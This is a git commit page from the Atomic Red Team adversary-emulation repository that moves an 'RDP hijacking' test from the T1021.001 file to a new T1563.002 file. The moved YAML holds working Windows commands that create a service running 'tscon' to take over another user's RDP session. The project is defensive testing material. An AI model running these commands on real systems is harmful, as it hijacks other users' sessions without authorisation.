security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Moved Atomic for RDP Hijacking (#1199)

Browse Source 
* Removing RDP Hijacking Atomic

Removing RDP Hijacking Atomic and moving to T1563.002-RDP Hijacking

* Create T1563.002.yaml

Moved from T1021.001
This commit is contained in:
Tsora-Pop
2020-08-15 21:23:54 -05:00
committed by GitHub
parent 22a8e308ca
commit 6bd48533a3
2 changed files with 27 additions and 24 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1021.001/T1021.001.yaml
-24
View File
@@ -1,30 +1,6 @@
attack_technique: T1021.001
display_name: 'Remote Services: Remote Desktop Protocol'
atomic_tests:
- name: RDP hijacking
auto_generated_guid: a37ac520-b911-458e-8aed-c5f1576d9f46
description: |
RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
supported_platforms:
- windows
input_arguments:
Session_ID:
description: The ID of the session to which you want to connect
type: String
default: "1337"
Destination_ID:
description: Connect the session of another user to a different session
type: String
default: rdp-tcp#55
executor:
command: |
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon #{Session_ID} /dest:#{Destination_ID}"
net start sesshijack
cleanup_command: |
sc.exe delete sesshijack >nul 2>&1
name: command_prompt
elevation_required: true
- name: RDPto-DomainController
auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e
description: |
atomics/T1563.002/T1563.002.yaml
+27
View File
@@ -0,0 +1,27 @@
attack_technique: T1563.002
display_name: 'Remote Service Session Hijacking: RDP Hijacking'
atomic_tests:
- name: RDP hijacking
auto_generated_guid: a37ac520-b911-458e-8aed-c5f1576d9f46
description: |
RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
supported_platforms:
- windows
input_arguments:
Session_ID:
description: The ID of the session to which you want to connect
type: String
default: "1337"
Destination_ID:
description: Connect the session of another user to a different session
type: String
default: rdp-tcp#55
executor:
command: |
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon #{Session_ID} /dest:#{Destination_ID}"
net start sesshijack
cleanup_command: |
sc.exe delete sesshijack >nul 2>&1
name: command_prompt
elevation_required: true